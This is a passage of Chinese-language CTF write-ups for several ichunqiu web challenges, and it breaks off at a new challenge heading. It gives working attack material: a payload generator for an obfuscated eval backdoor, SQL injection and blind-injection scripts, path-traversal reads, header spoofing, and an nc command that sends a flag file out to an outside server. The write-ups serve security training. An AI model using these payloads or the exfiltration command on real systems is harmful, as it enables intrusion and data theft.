  772. //base64解码后,通过x函数与$k进行异或计算,gzip解压,以$f截断(此时$e的值等于$f)
  773.                 @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
  774.                 $o=ob_get_contents();
  775.                 ob_end_clean();
  776.                 $d=base64_encode(x(gzcompress($o),$k)); print("<$k>$d</$k>"); //gzip压缩执行结果,并与$k进行异或计算
  777.                 @session_destroy();
  778.             }
  779.         }
  780.     }
  781. }
  782. x($t, $k)函数是个异或函数,第一个参数和第二个参数按位对应异或,如果第二个参数全部异或了一遍,第一个还没结束,又从第二个参数头部从头开始。
  783. $rr是通过http报头的Referer参数传入,我们可控
  784. $rs是通过http报头的accept-language参数传入,我们可控
  785. 这里先介绍下accpet-language吧,举个栗子
  786. 这里的zh-CN是默认语言,之后每个值以“,(逗号)”隔开,格式为“ 语言;q=权重 ”
  787. 那么preg_match_all这个正则所做的事,看着很复杂,我们直接把他输出到自己服务器的web上吧
  788. 是一个二维数组,然后$i会取[1][0]和[1][1]的组合值
  789. $h和f分别是 ($i . $kh)和($i . $kf)的md5值的前3个字符这里算出来是675和a3e
  790. 这一段代码会看language的语言有多少个,然后$p是以权重的小数部分值为下标,然后取Referer的url中的对应下标的参数的值的组合
  791. 这里举个例子,a=1中的1 就是$q[$m[2][0]],b=2中的2 就是$q[$m[2][1]]
  792. 然后就是判断$p这个变量前3个是不是675,后3个是不是a3e,最后我们的构造为 "675 + payload + a3e"
  793. 然后就是传到eval函数里面了,这里我们要通过eval函数来读目录,然后查看flag
  794. eval中用了很多编码方式,也用到了自定的x($t, $k)这个异或函数,我们依次测试下顺序,就能正确的生成我们的payload,来构造system("ls");
  795. 这里异或的规律
  796. a = b ^ c那么 b = a ^ c;这是一个很简单的规律,所以x函数即使编码函数,也是解码函数
  797. 最后附上我生成payload和解码返回值的内容的php代码
  798. <?php
  799. function x($t,$k) {
  800.     $c=strlen($k);
  801.     $l=strlen($t);
  802.     $o="";
  803.     for($i=0; $i<$l;) {
  804.         for($j=0; ($j<$c&&$i<$l); $j++,$i++) {
  805.             $o.= $t{$i} ^ $k{$j};
  806.         }
  807.     }
  808.     return $o;
  809. }
  810. function get_answer($str){
  811.     $str = base64_decode($str);
  812.     $str = x($str, '4f7f28d7');
  813.     $str = gzuncompress($str);
  814.     echo $str . "<br>";
  815. }
  816. //输出向服务器提交的变量a中payload值  ?a=675 + payload + a3e
  817. function input($cmd){
  818.     $str = 'system("' . $cmd . '");';
  819.     $t1 = gzcompress($str);
  820.     echo '$t1 = ' . $t1 . "<br>";
  821.     $t2 = x($t1, '4f7f28d7');
  822.     echo '$t2 = ' . $t2 . "<br>";
  823.     $t3 = base64_encode($t2);
  824.     echo '$t3 = ' . $t3 . "<br>";
  825.     return $t3;
  826. }
  827. $ra='zh-CN,zh;q=0.0';
  828. input('ls'); //第一次的命令
  829. input('cat this_i5_flag.php');// //第一次的命令
  830. ?>
  831. 把命令输入input里面,运行这个php脚本就会生成ls命令的payload,而我们accep-language所填内容为 'zh-CN,zh;q=0.0'
  832. 得到执行ls的payload值:TPocyB4WLfrhNv1PZOrQMTREimJn
  833. 得到执行
  834. cat this_i5_flag.php的payload值:TPocyB4WLfrhNn0oHmlM/vxKuakGtSv8fSrgTfoQNOWAYDfeUDKW
  835. 第一次执行命令的payload(675+TPocyB4WLfrhNv1PZOrQMTREimJn+3e)为请求生成的解密返回的值:
  836. 这里请求访问将Accept-Language: zh-CN,zh;q=0.0和Referer:http://eb74b49c758449eab4bef45af0b8e8e7f872ea67ce774e9a.changame.ichunqiu.com/Challenges/index.php?a=payload值添加到http请求头,然后发送请求,在
  837. 响应页面得到解密后返回的值
  838. 得到解密值:
  839. TPp8VHv2Kv4DTuVN+hCEff8ve2EBCpdlZk33ypDEwMumBIr0uCrKpbiq1Z5+6xyPHma96ydT
  840. 第二执行命令的
  841. payload(675+TPocyB4WLfrhNn0oHmlM/vxKuakGtSv8fSrgTfoQNOWAYDfeUDKW+3e)为请求生成的解密返回的值:
  842. 得到解密值:
  843. TPqE1x3wTNfRNH6te3Qzh2E2MLfnfk2+ne9+cPSCLaGdL41ApH4tjSIAd/CzUdZOrieV43Oq3WaZ3AJJpYV5IDQJ63f8
  844. 将得到的解密值填入到下面脚本中执行,可获得flag信息:
  845. <?php
  846. function x($t,$k) {
  847.     $c=strlen($k);
  848.     $l=strlen($t);
  849.     $o="";
  850.     for($i=0; $i<$l;) {
  851.         for($j=0; ($j<$c&&$i<$l); $j++,$i++) {
  852.             $o.= $t{$i} ^ $k{$j};
  853.         }
  854.     }
  855.     return $o;
  856. }
  857. function get_answer($str){
  858.     $str = base64_decode($str);
  859.     $str = x($str, '4f7f28d7');
  860.     $str = gzuncompress($str);
  861.     echo $str . "<br>";
  862. }
  863. //输出向服务器提交的变量a中payload值  ?a=675 + payload + a3e
  864. function input($cmd){
  865.     $str = 'system("' . $cmd . '");';
  866.     $t1 = gzcompress($str);
  867.     echo '$t1 = ' . $t1 . "<br>";
  868.     $t2 = x($t1, '4f7f28d7');
  869.     echo '$t2 = ' . $t2 . "<br>";
  870.     $t3 = base64_encode($t2);
  871.     echo '$t3 = ' . $t3 . "<br>";
  872.     return $t3;
  873. }
  874. $ra='zh-CN,zh;q=0.0';
  875. input('ls'); //第一次的命令
  876. input('cat this_i5_flag.php');// //第一次的命令
  877. //服务器两次返回的值
  878. get_answer('TPp8VHv2Kv4DTuVN+hCEff8ve2EBCpdlZk33ypDEwMumBIr0uCrKpbiq1Z5+6xyPHma96ydT');
  879. get_answer('TPqE1x3wTNfRNH6te3Qzh2E2MLfnfk2+ne9+cPSCLaGdL41ApH4tjSIAd/CzUdZOrieV43Oq3WaZ3AJJpYV5IDQJ63f8')
  880. ?>
  881. 最终flag:
  882. flag{2daeab83-b9eb-492b-86eb-05c7f0a80b72}
  883. 漏洞名称:GetFlag
  884. 题目内容:一步一步一步的靠近它
  885. 漏洞writeup:
  886. 启动题目场景,获得靶场网站,访问网站,发现连接中有一个login登陆按钮
  887. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/index.php
  888. 进入登陆页面,要求输入账号密码和验证码
  889. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/action.php?action=login
  890. 并且页面中显示的内容:
  891. substr(md5(captcha), 0, 6)=39f049
  892. 给出了一个截取验证码的MD5 Hash前六位字符,根据代码,猜想这题是要碰撞出验证码对应的明文。
  893. 使用Python编写出相应的工具,可以根据MD5 Hash前六位碰撞出明文,明文的范围通过多次尝试,得知在6位至8位
  894. #!/usr/bin/env python
  895. # -*- coding: utf-8 -*-
  896. # Time    : 2018/8/20 22:50
  897. # Author  : SDFZ
  898. # Site    : sdfzy.top
  899. # File    : test.py
  900. #===================================================================
  901. import hashlib
  902. def md5(s):
  903.     return hashlib.md5(str(s).encode('utf-8')).hexdigest() #用md5先把参数s用utf-8编码之后进行加密,hexdigest表示返回返回摘要,作为十六进制数据字符串值
  904. def main(s):
  905.     for i in range(1,99999999):
  906.         if md5(i)[0:6]  == str(s):     #截取密文前6位与 用户传入的值进行比对  (具体情况具体修改)
  907.             print(i)
  908.             exit(0)
  909. if __name__ == '__main__':
  910.     main("36c22c")
  911. 执行结果,碰撞出验证码:
  912. 得到的验证码为:35627749
  913. 得到验证码之后,再去猜解账户密码,手工多次尝试后,发现登陆点存在注入漏洞,使用万能用户账号:admin' or '1'='1# 密码任意,可登陆系统
  914. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/action.php?action=login
  915. 成功登陆到系统后,发现后台有3个文件可以下载
  916. 分别对hello.txt和s.txt以及a.php进行下载,并查看内容,发现并没有可利用点
  917. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/file/download.php?f=hello.txt
  918. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/file/download.php?f=s.txt
  919. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/file/download.php?f=a.php
  920. 同时也可以看到
  921. Challenges/file/download.php?f=连接中的f参数可能存在任意文件包含漏洞
  922. 这里参数读取/etc/passwd,这里读取的内容,并不是/etc/passwd的内容
  923. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/file/download.php?f=../etc/passwd
  924. 接着参数读取flag.php,也发现不能读取flag.php的内容
  925. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/file/download.php?f=../flag.php
  926. 手工测试发现在Chanllenges目录下存在flag.php,只是访问是空白的,那么猜测flag.php的默认路径为:/var/www/html/
  927. Challenges/flag.php(一般apache服务器的网站默认路径为/var/www/html)
  928. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/flag.php
  929. 因此,我们就通过?f=参数进行文件包含
  930. /var/www/html/
  931. Challenges/flag.php读取其内容,可直接读取内容并下载文件到本地。
  932. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/file/download.php?f=/var/www/html/flag.php
  933. 得到flag.php的源码:
  934. <?php
  935. $f = $_POST['flag'];
  936. $f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
  937. if((strlen($f) > 13) || (false !== stripos($f, 'return')))
  938. {
  939.         die('wowwwwwwwwwwwwwwwwwwwwwwwww');
  940. }
  941. try
  942. {
  943.          eval("\$spaceone = $f");
  944. }
  945. catch (Exception $e)
  946. {
  947.         return false;
  948. }
  949. if ($spaceone === 'flag'){
  950.     echo file_get_contents("helloctf.php");
  951. }
  952. ?>
  953. 对代码进行审计分析:
  954. 理想情况下POST提交的flag=flag即可,而且出现’`’, ‘$’, ‘*’, ‘#’, ‘:’, ‘\’, ‘"’, “’”, ‘(’, ‘)’, ‘.’, '>'都会被替换成空格,
  955. 且参数的长度必须小于13以及不包含return的字符串,才能执行eval函数。但是eval函数做了异常处理,直接提交flag=flag会产生异常,而提交flag='flag'或flag="flag",引号会被过滤
  956. 满足$spaceone === 'flag'。而$spaceone = $f,$f可控,那么我们用post方式提交flag=flag,但是并没有拿到flag。
  957. 其实这里是触发了异常处理,eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。
  958. 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。这里我们在post的时候加个分号拿到flag
  959. 所以flag.php传入参数?flag=flag;即可获得helloctf.php的内容
  960. 下面构造参数读取flag,提交后页面中并没有flag.
  961. http://a2197c26618d4fd0a845dbdc49c771c42323c422cf024ed0.changame.ichunqiu.com/Challenges/flag.php
  962. post:
  963. flag=flag;
  964. 查看源代码,发现flag内容
  965. 最终flag为:
  966. flag{0299ca95-6d09-4f70-b7a3-ac765f06d558}
  967. 题目名称:Not Found
  968. 题目writeup:
  969. 启动题目场景,获得靶场网站,访问网站,页面内容显示not found,且显示一个/404.php的路径
  970. http://eba7dd1e003c4745a2716d3225858e3b38f73d6ae9564699.changame.ichunqiu.com/
  971. 访问404.php并没有发现任何可利用点
  972. http://eba7dd1e003c4745a2716d3225858e3b38f73d6ae9564699.changame.ichunqiu.com/404.php
  973. 在访问靶场网站主页的时候,通过burpsuit对其抓包分析,发现在http响应头部中包含了一个特殊的字符
  974. X-Method: haha
  975. X-Method: haha添加到http请求头部中发送请求,发现在响应http头部中并没有发生变化。
  976. X-Method字面意思是方法,猜测有可能与http请求方法有关,那么HTTP请求方法有Get,Post,OPTIONS,PUT,DELETE,CONNECT,TRACE,挨个试,在试到OPTIONS的时候出现了302重定向,并且在location中出现了?f=1.php
  977. 通过GET方法直接访问/
  978. ?f=1.php,发现页面显示404,并没有内容
  979. 测试OPTIONS方法发送
  980. /
  981. ?f=1.php请求,在http响应页面中显示了1.php的源码。
  982. 得到1.php源码,发现并没有可利用点。
  983. <?php
  984.     $msg = "not here";
  985.     $msg .= PHP_EOL;
  986.     $msg .="plz trying";
  987.     echo $msg;
  988. 通过
  989. cansina目录扫描工具,发现系统中存在1.php,flag.php,.htaccess和index.phps文件
  990. https://github.com/deibit/cansina
  991. 测试OPTIONS方法发送
  992. /
  993. ?f=flag.php和/?f=index.phps请求,在http响应页面中显示了"not allowed file"
  994. 测试OPTIONS方法发送/?f=.htaccess
  995. ,在http响应页面中显示了"^8d829d8568e46455104209db5cd9228d.html $ 404.php [L]",说明系统中还存在8d829d8568e46455104209db5cd9228d.html 文件。
  996. .htaccess文件提供了一种目录级别的修改配置的方式。一个文件,包含一条或多条配置指令,放置于目录下,这些配置指令对当前目录和其所有子目录生效),就相当于一个配置文件。
  997. 直接get请求访问
  998. 8d829d8568e46455104209db5cd9228d.html,抓包发送请求,在响应页面发现显示"ip incorrect ???XFF??",X-Forwarded-For是XFF的简称,猜测是x-forwarded-for伪造为127.0.01
  999. http://82bdf98a1cc742c6bdf7d47338a78118e818dcc33f3f4138.changame.ichunqiu.com/8d829d8568e46455104209db5cd9228d.html
  1000. 在http请求头加上x-forwarded-for:127.0.0.1,并发送请求包,在http响应页面中依然显示
  1001. "ip incorrect ???XFF??"
  1002. 既然
  1003. x-forwarded-for不行,那么还有另一种IP伪造的方法是client-ip,这里尝试在http头部添加client-ip:127.0.0.1,并发送请求包,在http响应页面中显示了flag内容
  1004. 最终flag:
  1005. flag{b85bcdc4-9faa-4a06-a674-547ac6151c13}
  1006. 题目名称:Vld
  1007. 题目内容:没有什么好介绍的
  1008. 题目writeup:
  1009. 启动题目场景,获得靶场网站,访问网站,发现页面内容显示“do you know Vulcan Logic Dumper?"
  1010. http://059751fe7e974e939bcf1694e02e66bf655116bcb4fc4eb5.changame.ichunqiu.com/
  1011. 通过谷歌搜索发现Vulcan Logic Dumpe这样定义:
  1012. vld是PECL(PHP 扩展和应用仓库)的一个PHP扩展,现在最新版本是 
  1013. 0.17.1,它的作用是:显示转储PHP脚本(opcode)的内部表示(
  1014. 来自PECL的vld简介)。
  1015. 简单来说,可以查看PHP程序的opcode。
  1016. 查看主页的 源码在注释页面中显示了index.php.txt
  1017. view-source:http://059751fe7e974e939bcf1694e02e66bf655116bcb4fc4eb5.changame.ichunqiu.com/
  1018. 访问
  1019. index.php.txt文件,发现是一堆看不懂的内容
  1020. http://059751fe7e974e939bcf1694e02e66bf655116bcb4fc4eb5.changame.ichunqiu.com/index.php.txt
  1021. 这肯定就是所谓的Vulcan Logic Dumper了,先了解下相关概念
  1022. PHP内核-Zend引擎:http://www.php.cn/php-weizijiaocheng-355597.html
  1023. PHP中的opcode:https://blog.csdn.net/weiyuanke/article/details/76921476
  1024. Vulcan Logic Dumper:http://www.phppan.com/2011/05/vld-extension/
  1025. 也就是说上文中看到的一堆代码其实就是借助vld得到的,php语言中提供zend引擎执行的中间代码opcode。有了opcode便可以将其翻译成php代码。  网上也没找到翻译opcode的工具,只好借着对照表自己人工翻译了...
  1026. (opcode对照表:http://www.php.net/manual/en/internals2.opcodes.list.php)
  1027. 这段代码比较简单,其实掌握下规律还是挺好分析的,这是我初步分析的结果
  1028. <?php
  1029.   echo'do+you+know+Vulcan+Logic+Dumper%3F%3Cbr%3E';
  1030.     $0=$_GET['flag1'];
  1031.     $1=$_GET['flag2']
  1032.     $2=$_GET['flag3'];
  1033.         21      如果$0不等于'fvhjjihfcv'
  1034.         22      跳转到38行
  1035.         24      如果$1不等于'gfuyiyhioyf'
  1036.         25      跳转到35行
  1037.         27      如果$2不等于'yugoiiyhi'
  1038.         28      跳转到32行
  1039.         30      echo'the+next+step+is+xxx.zip';
  1040.         31      跳转到34行
  1041.         32      EXT_STMT
  1042.         33      echo'false%3Cbr%3E';
  1043.         34      跳转到37行
  1044.         35      EXT_STMT
  1045.         36      echo'false%3Cbr%3E';
  1046.         37      跳转到40行
  1047.         38      EXT_STMT
  1048.         39      echo'false%3Cbr%3E';
  1049.         40      NOP
  1050.         41      EXT_STMT
  1051.         42      echo%3C%21--+index.php.txt+%3F%3E%0D%0A%0D%0A';
  1052. ?>
  1053. 进一步转换为php代码:
  1054. <?php
  1055.     echo 'do you know Vulcan Logic Dumper?<br>';
  1056.     $a=$_GET['flag1'];
  1057.     $b=$_GET['flag2'];
  1058.     $c=$_GET['flag3'];
  1059.     if($a!='fvhjjihfcv')
  1060.     {
  1061.         echo 'false<br>';
  1062.     }
  1063.     elseif($b!='gfuyiyhioyf')
  1064.     {
  1065.         echo 'false<br>';
  1066.     }
  1067.     elseif($c!='yugoiiyhi')
  1068.     {
  1069.         echo 'false<br>';
  1070.     }
  1071.     else
  1072.     {
  1073.         echo 'the next step is xxx.zip';
  1074.     }
  1075.     echo '<!-- index.php.txt ?>';
  1076. ?>
  1077. 有三个get参数flag1、flag2、flag3分别对应三个字符串,同时get这三个参数
  1078. 那么构造/index.php?flag1=fvhjjihfcv&flag2=gfuyiyhioyf&flag3=yugoiiyhi
  1079. 那么get请求访问:http://059751fe7e974e939bcf1694e02e66bf655116bcb4fc4eb5.changame.ichunqiu.com/index.php?flag1=fvhjjihfcv&flag2=gfuyiyhioyf&flag3=yugoiiyhi
  1080. 网页内容转给你显示“the next step is 1chunqiu.zip”, 那么猜测可能访问
  1081. 1chunqiu.zip文件。
  1082. 于是git请求访问:https://059751fe7e974e939bcf1694e02e66bf655116bcb4fc4eb5.changame.ichunqiu.com/1chunqiu.zip,得到
  1083. 1chunqiu.zip压缩文件,并对其进行解压得到一些php文件
  1084. 在login.php的源码里有注入点,会对username的特殊符号进行处理,还会进行替换处理,输入的username会被剔除掉number里的内容。
  1085. login.php的代码如下:
  1086. ?php
  1087. require_once 'dbmysql.class.php';
  1088. require_once 'config.inc.php';
  1089. if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['number'])){
  1090.     $db = new mysql_db();
  1091.     $username = $db->safe_data($_POST['username']);   //safe_data()函数给特殊符号加上了反斜杠
  1092.     $password = $db->my_md5($_POST['password']);
  1093.     $number = is_numeric($_POST['number']) ? $_POST['number'] : 1;
  1094.     $username = trim(str_replace($number, '', $username));   //替换了username中的number的内容
  1095.     $sql = "select * from"."`".table_name."`"."where username="."'"."$username"."'";     //可注入语句
  1096.     $row = $db->query($sql);
  1097.     $result = $db->fetch_array($row);
  1098.     if($row){
  1099.         if($result["number"] === $number && $result["password"] === $password){
  1100.             echo "<script>alert('nothing here!')</script>";
  1101.         }else{
  1102.             echo "<script>
  1103.             alert('密码错误,老司机翻车了!');
  1104.             function jumpurl(){
  1105.                 location='login.html';
  1106.             }
  1107.             setTimeout('jumpurl()',1000);
  1108.             </script>";
  1109.         }
  1110.     }else{
  1111.         exit(mysql_error());
  1112.     }
  1113. }else{
  1114.     echo "<script>
  1115.             alert('用户名密码不能为空!');
  1116.             function jumpurl(){
  1117.                 location='login.html';
  1118.             }
  1119.             setTimeout('jumpurl()',1000);
  1120.         </script>";
  1121. }
  1122.  ?>
  1123. 简单对login.php进行代码分析:
  1124. 首先判断number是否为数字,将username中与number相同的字符替换为空,username还进行了safe_data()函数的处理
  1125. password经过md5加密,number只能是纯数字,所以都不存在注入点。但是username虽然经过addslashes()处理,addslashes()会将%00转义为\0,单引号也会被转义(单引号,反斜杠等前面都会被加上反斜杠而转义,防御sql注入),但是又再次被这句代码处理 "  $username = trim(str_replace($number, '', $username));  ",所以我们可以利用这里让单引号逃逸出.
  1126. %00会被转义成\0 ,同时在进行sql查询的时候$username会被单引号包裹,那么可以想办法闭合掉单引号。
  1127. 如果$username的值是%00',经过safe_data处理%00'会变成\0\',然后让number值为0,username中的0被替换为空,最后username=\\'
  1128. 这样转义单引号的反斜杠被前一个转义,导致后面的单引号逃逸,成功闭合前面语句,可以进行注入.
  1129. 而且注入后只提供了报错的回显,于是可以使用报错注入。
  1130. 同时下载的压缩文件实际上是网站的源码备份,那么可以访问1chunqiu/login.html路径,得到网站登录页面。
  1131. http://059751fe7e974e939bcf1694e02e66bf655116bcb4fc4eb5.changame.ichunqiu.com/1chunqiu/login.html
  1132. 登录页面中输入车牌号和用户名以及密码,并抓包,发送请求
  1133. 由于没有数据回显点,所以考虑进行报错注入:
  1134. 使用updatexml报错注入,测试是否存在注入
  1135. number=0&username=%00' &password=3&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
  1136. 看到数据库报错,说明单引号逃逸成功,当username提交 %00' ,经过addslashes()处理后(addslashes()会在NULL前加 \ ,0等于NULL)是  \0\'。
  1137. 而number也是0,所以将从username中去掉0,username则变成  \\'  ,单引号前的\被\转义,所以单引号逃逸成功,后台sql语句为 select * from`users`where username=' \\ ' '   ,可见多出一个单引号,当然报错。
  1138. 报错出表名:
  1139. number=0&username=%00' and updatexml(1,mid((select concat(1,group_concat(table_name)) from information_schema.tables where table_schema=database()),1),1)#&password=x&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
  1140. 或者
  1141. number=0&username=%00' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)#&password=x&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
  1142. 得到表名:user1和flag
  1143. 报错出列名:
  1144. number=0&username=%00' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database()),1),1)#
  1145. &password=x&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
  1146. 得到列名:flag,username,password,number1
  1147. 查询flag表中flag列的字段内容(因为updatexml报错只显示32位,所以用substr分割显示flag)
  1148. 报错出flag字段的前半部分:
  1149. number=0&username=%00' and updatexml(1,concat(1,(select substr(flag,1,32) from flag),1),1)#&password=x&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
  1150. 得到flag的前部分:flag{0e0aa024-4103-43d1-9569-1aa
  1151. 报错出flag字段的后半部分:
  1152. number=0&username=%00' and updatexml(1,concat(1,(select substr(flag,15,32) from flag),1),1)#&password=x&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
  1153. 得到flag的后部分:d1-9569-1aa57700f560}
  1154. 组合一起,得到flag:
  1155. flag{0e0aa024-4103-43d1-9569-1aa57700f560}
  1156. 题目名称:
  1157. 题目writeup:
  1158. 启动题目场景,获得题目靶场网站,访问网站,发现主页就是一张小猫图片以及no sing内容提示
  1159. http://8fafabde91ad45e794cd3494cd780e42db150b652f414b20.changame.ichunqiu.com/
  1160. 查看靶场网站主页的源码,发信有vim的编辑,于是想到有可能index.php被vim编辑过且意外退出没有保存导致
  1161. 产生了swp文件,因此可能存在.index.php.swp文件
  1162. get请求访问
  1163. .index.php.swp文件,发现可以下载到本地,打开发现是乱码
  1164. https://8fafabde91ad45e794cd3494cd780e42db150b652f414b20.changame.ichunqiu.com/.index.php.swp
  1165. 通过vim -r 命令恢复.swp文件
  1166. vim -r index.php.swp
  1167. 恢复后得到的index.php源码:
  1168. <html>
  1169. <head>
  1170. <title>blind cmd exec</title>
  1171. <meta language='utf-8' editor='vim'>
  1172. </head>
  1173. </body>
  1174. <img src=pic.gif>
  1175. <?php
  1176. /*
  1177. flag in flag233.php
  1178. */
  1179.  function check($number)
  1180. {
  1181.         $one = ord('1');
  1182.         $nine = ord('9');
  1183.         for ($i = 0; $i < strlen($number); $i++)
  1184.         {
  1185.                 $digit = ord($number{$i});
  1186.                 if ( ($digit >= $one) && ($digit <= $nine) )
  1187.                 {
  1188.                         return false;
  1189.                 }
  1190.         }
  1191.            return $number == '11259375';
  1192. }
  1193. if(isset($_GET[sign])&& check($_GET[sign])){
  1194.         setcookie('auth','tcp tunnel is forbidden!');
  1195.         if(isset($_POST['cmd'])){
  1196.                 $command=$_POST[cmd];
  1197.                 $result=exec($command);
  1198.                 //echo $result;
  1199.         }
  1200. }else{
  1201.         die('no sign');
  1202. }
  1203. ?>
  1204. </body>
  1205. </html>
  1206. 下面简单对源码进行代码审计分析:
  1207. 先用GET传入一个sign,并放入check函数,check过了就会POST传参cmd,并执行,check失败就会输出no sign,这里可以用11259375的十六进制绕过:0xabcdef
  1208. http://8fafabde91ad45e794cd3494cd780e42db150b652f414b20.changame.ichunqiu.com/index.php?sign=
  1209. 0xabcdef
  1210. 没有no sign说明绕过成功
  1211. 接下来就是post提交命令,里面还有 setcookie('auth','tcp tunnel is forbidden!'); 这段提示说明TCP被禁止不能用curl,而且cmd命令执行后也没有回显,但最前面的注释告诉了我们flag的文件,
  1212. 那么我们直接用nc命令把flag文件下载下来,我们需要一台有公网ip的服务器,我们
  1213. 先在自己公网VPS服务器开启nc监听upd端
  1214. 口:
  1215. nc -ul 2233
  1216. post传参给cmd:cmd=nc -u 公网IP地址  55566 < flag233.phpcmd=nc  -u  36.111.20.223 2233 < flag233.php
  1217. 提交post请求,在VPS服务器上反弹出flag内容
  1218. 最终得到flag:
  1219. flag{a2213dd2-4411-4320-983a-b56d3a6dedaf}
  1220. 题目名称:登陆
  1221. 题目描述:先登陆再说
  1222. tips1:隐藏文件?非php源代码
  1223. tips2:缓存?
  1224. 题目writeup:
  1225. 启动靶场,获得靶场网站,访问网站,得到一个登陆页面
  1226. http://29c9b579802142c094847ac64d8d440e4f1c35b78e224107.changame.ichunqiu.com/Challenges/index.php
  1227. 对其主页查看源代码发现 ,用户名和密码的字段名分别为
  1228. user_n3me和p3ss_w0rd
  1229. 尝试输入admin' or 1=1#,密码随便输,页面显示密码错误
  1230. 再尝试用户名
  1231. admin' or'1'='1#,密码随便输,页面显示用户名不存在
  1232. 确定为布尔盲注
  1233. 发现mid, substr, left ,search 以及information_schema等很多函数都不能使用,
  1234. 测试like盲注方法可进行注入,类似: admin’ or database() like ‘c%’ ;# 这样的
  1235. 使用python脚本进行盲注跑出用户名:
  1236. import string
  1237. import requests
  1238. url = 'http://6aca48750940452cb8b1df89e9dd9e2aa36215093cb24102.changame.ichunqiu.com/Challenges/login.php'
  1239. headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
  1240. payloads = string.ascii_letters + string.digits
  1241. temp = ''
  1242. for i in range(40):
  1243.     print("hello")
  1244.     for p in payloads:
  1245.         payload = temp + p
  1246.         name = "admin' or user_n3me like '{}%' ;#".format(payload)
  1247.         data = dict(username=name, passwrod='test')
  1248.         res = requests.post(url, headers=headers, data=data)
  1249.         if (len(res.content) == 12):
  1250.             temp = temp + p
  1251.             print(temp.ljust(32, '.'))
  1252.             break
  1253. 得到用户名:bctf3dm1n
  1254. 使用python
  1255. 脚本进行盲注跑出用户密码:
  1256. #-*- coding:utf-8 -*-
  1257. #python3
  1258. from urllib.request import urlopen
  1259. from urllib import parse,request
  1260. import sys
  1261. import threading
  1262. url = 'http://6aca48750940452cb8b1df89e9dd9e2aa36215093cb24102.changame.ichunqiu.com/Challenges/login.php'
  1263. def get_database_length():
  1264.     for i in range(1,sys.maxsize):
  1265.         username= "admin' or length(database())>{0}#"
  1266.         username = username.format(i)
  1267.         values = {"username":username, 'password':''}  
  1268.         data = parse.urlencode(values).encode('utf-8') 
  1269.         response = request.Request(url, data)
  1270.         response = urlopen(response)
  1271.         if len(response.read().decode()) != 4:
  1272.             print("当前数据库长度为:", i)
  1273.             return i
  1274. def get_database_name():
  1275.     global lock
  1276.     lit=list("0123456789qwertyuioplkjhgfdsazxcvbnmPOIUYTREWQASDFGHJKLMNBVCXZ")
  1277.     #后台SQL语句形如:
  1278.     #select xxx from xxx where username='' or 其他字段=xxx#
  1279.     #我们把其他字段替换成user_n3me或者p3ss_w0rd即可得出表中的用户名和密码字段
  1280.     username="admin' or p3ss_w0rd like '{0}%'#"
  1281.     database=''
  1282.     print("Start to retrive the database")
  1283.     while True:
  1284.         curId=0
  1285.         while True: 
  1286.             if curId == len(lit):
  1287.                 break
  1288.             i = curId
  1289.             curId += 1
  1290.             un=username.format(database+lit[i])
  1291.             print(un)
  1292.             values = {"username":un, 'password':''}     
  1293.             data = parse.urlencode(values).encode('utf-8') 
  1294.             response = request.Request(url, data)
  1295.             response = urlopen(response)
  1296.             if len(response.read().decode()) == 4:
  1297.                 database=database+lit[i]
  1298.                 print("the database is :%s" % database) 
  1299.                 break
  1300.         if curId == len(lit):
  1301.             print(database)
  1302.             break
  1303. #print(get_database_length())
  1304. get_database_name()
  1305. 得到
  1306. bctf3dm1n的密码MD5值:2bfb1532857ddc0033fdae5bde3facdf。
  1307. 解密:adminqwe123666
  1308. 在登录页面中输入用户名:
  1309. bctf3dm1n和密码:
  1310. adminqwe123666,成功登陆系统
  1311. http://6aca48750940452cb8b1df89e9dd9e2aa36215093cb24102.changame.ichunqiu.com/Challenges/index.php
  1312. 在网页页面上提示网站根目录下存在.bctfg1t、index.php、login.php两个文件和一个隐藏目录,其中两个文件我们在登录过程中已经使用过了,
  1313. 所以猜测flag就在隐藏目录中,然而该目录并没有访问权限,这里通过
  1314. git_extract下载git,由于题目场景靶机有问题没有下载下来。
  1315.  python  git_extract.py 
  1316. http://29c9b579802142c094847ac64d8d440e4f1c35b78e224107.changame.ichunqiu.com/Challenges/.git/
  1317. 正常可以看到下载到本地包含flag.php.a17d89 ,且内容中包含了一个
  1318. 71ec9d5ca5580c58d1872962c596ea71.php文件。
  1319. get请求访问71ec9d5ca5580c58d1872962c596ea71.php,得到falg内容。
  1320. http://29c9b579802142c094847ac64d8d440e4f1c35b78e224107.changame.ichunqiu.com/Challenges/71ec9d5ca5580c58d1872962c596ea71.php
  1321. 最终得到falg:
  1322. flag{db15e0ed-0d84-43b2-a904-a709b8a48beb}
  1323. 题目名称:Gift
